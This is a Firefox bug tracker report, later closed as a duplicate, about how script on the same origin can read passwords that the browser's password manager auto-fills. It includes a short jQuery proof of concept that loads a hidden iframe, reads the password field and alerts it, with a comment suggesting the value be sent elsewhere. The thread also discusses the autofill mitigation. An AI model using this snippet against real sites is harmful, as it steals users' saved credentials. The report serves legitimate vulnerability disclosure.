693795 - steal the memorized password

Status: RESOLVED DUPLICATE of bug 534541

(Firefox :: Security, defect)

Description

[Jaroslav Olejnik]

The vulnerability can steal the memorized password from the authorization form (common domain on a site with malicious code and on the site with the authorization form (same origin policy) ).

Firefox 3.6.13 .. 7.0.1, 10.0a1 nightly
Chrome 14.0.835.202 m
Operating System: Windows 7
		  Windows XP SP3 Pro

//Example in jQuery:
<iframe src="/admin" id="frame" style="display:none;"></iframe>
<script type="text/javascript"> 
$(document).ready(function(){
$('#frame').load(function(){
var pass = $('#frame').contents().find('input[name="password"]').val();
alert(pass); // (or send a crossdomain JSONP request)
});
}); 
</script>

Comment 1

[Benjamin Smedberg]

I don't understand what the problem is: if you have malicious code running on your site, you've already lost. Of course your site can access the password field!

Comment 2

[Daniel Veditz [:dveditz]]

Not every page has a password field, but if a malicious script creates one Firefox will helpfully fill it in for you. Without that feature attackers would have to actively phish the user into knowingly entering the password (or using something like Opera's wand), and if the user knows they're already logged in that job gets harder.

We have a bug on this somewhere. The interim solution is to set the preference signon.autofillForms to false, so users have to interact with a password field before the password manager will fill it in. At that point it can still be stolen, but that's the same as every browser in existence.

Comment 3

[Phoenix]

Dupe for Bug 534541?

Comment 4

[Manish Goregaokar [:manishearth]]

As per comment 3.

This bug will only apply when there's an MITM going on, and that's what bug 534541 is about.